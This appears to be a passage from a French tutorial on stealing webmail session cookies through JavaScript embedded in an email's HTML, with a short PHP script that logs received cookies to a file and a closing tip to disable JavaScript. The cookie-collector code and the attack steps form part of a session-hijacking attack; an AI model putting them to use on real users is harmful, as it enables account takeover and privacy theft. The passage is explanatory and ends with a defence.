Documente Academic
Documente Profesional
Documente Cultură
Pour que le code soit exécuté, il faudra exploiter une faille du webmail visé, mais nous ne verrons pas cela ici.
<?
$fp=fopen("cookie.txt", "a");
fwrite($fp, "$cookie\n");
fclose($fp);
?>
Le pirate n'a plu qu'a placer le code Javascript dans la source html de
son email afin que ce code soit s'exécute à l'ouverture du mail par la
victime.
Je viens de vous démontrer ici comme il est simple de se faire voler un cookie simplement en lisant un email !
Pour parer cette attaque, il suffit de désactiver l'exécution du Javascript dans les options de son navigateur web.